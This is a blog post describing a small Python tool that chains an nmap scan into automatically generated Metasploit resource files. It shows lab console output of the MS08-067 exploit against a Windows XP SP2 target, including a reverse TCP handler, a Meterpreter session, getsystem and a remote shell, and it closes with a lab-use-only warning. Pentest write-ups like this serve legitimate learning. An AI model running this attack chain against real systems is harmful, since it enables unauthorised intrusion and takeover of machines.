... the code I wrote few days ago as a (skeleton for) "proof-of-concept".
Now I decide to extend it a little bit, and rewrite the whole code (I assumed it will be a good
exercise for learning python, because I'm not a programmer:) So...).
TL;DR - on my github you will find the code.
Idea was to not create another super-python-security-scanner but to create a small tool
to run against host/IP and get a shell if possible. Below you will find old example for
vulnerable Windows XP SP2:
(…)
[i] Checking target directory:
/home/c/src/grabash/logs/192.168.56.110/
[+] Log directory
for target is already created.
[i] Preparing RC
files:
[+] Network RC file
created at : /home/c/src/grabash/logs/192.168.56.110/msf.rc
[+] HTTP RC file
created at : /home/c/src/grabash/logs/192.168.56.110/www.rc
[+] Reading scan
log...
[i] MS-DC Active
Directory found on port: 445
+ loading : 445 modules...
[i] Reding log file
: done.
[i] Starting
Metasploit with RC file :
/home/c/src/grabash/logs/192.168.56.110/msf.rc
(...)
Love leveraging
credentials? Check out bruteforcing
in Metasploit Pro --
learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.5-2016010401 ]
(...)
+ -- --=[ Free
Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing
/home/c/src/grabash/logs/192.168.56.110/msf.rc for ERB directives.
resource
(/home/c/src/grabash/logs/192.168.56.110/msf.rc)> spool /home/c/src/grabash/logs/192.168.56.110/output.msf
[*] Spooling to file
/home/c/src/grabash/logs/192.168.56.110/output.msf...
resource
(/home/c/src/grabash/logs/192.168.56.110/msf.rc)> use
exploit/windows/smb/ms08_067_netapi
resource
(/home/c/src/grabash/logs/192.168.56.110/msf.rc)> set RHOST 192.168.56.110
RHOST =>
192.168.56.110
resource
(/home/c/src/grabash/logs/192.168.56.110/msf.rc)> run
[*] Started reverse
TCP handler on 192.168.56.123:4444
[*] Automatically
detecting the target...
[*] Fingerprint:
Windows XP - Service Pack 2 - lang:Polish
[*] Selected Target:
Windows XP SP2 Polish (NX)
[*] Attempting to
trigger the vulnerability...
[*] Sending stage
(957487 bytes) to 192.168.56.110
[*] Meterpreter
session 1 opened (192.168.56.123:4444 -> 192.168.56.110:1026) at
2016-08-07 02:25:09 -0400
meterpreter >
getsystem
...got system via
technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
shell
Process 500 created.
Channel 1 created.
Microsoft Windows XP
[Wersja 5.1.2600]
(C) Copyright
1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\>net view
net view
(...)
-------------------------------------------------------------------------------
\\XPSP2
|
As you can see, script started nmap and save the output to log. 'grep' the log for
'open' port(s) and you will have a list of services on remote machine.
Now idea is to get information from the log scan to prepare useful attacks from Metasploit
and save the list of them (read: possible attacks) to RC file. Last step: run msf with RC file.
Some example output for few tests if we'll find Joomla:
As you will see during your (free) Metasploit adventures, few modules are not working "correctly".
(Maybe it's related to my settings, maybe not, anyway...) Skeleton of grabash.py is really simple.
If you know Ruby (or Metasploit), you can extend it and prepare more modules for your own pentests.
In case of any questions, feel free to ask.
Remember to use the code only:
- on your environment
- only for legal purpose
- not on the 'production'
Remember (and understand) that the modules used inside this code,
can result in a damage or 'blue screens'.
Use it on your own risk.
Cheers
Brak komentarzy:
Prześlij komentarz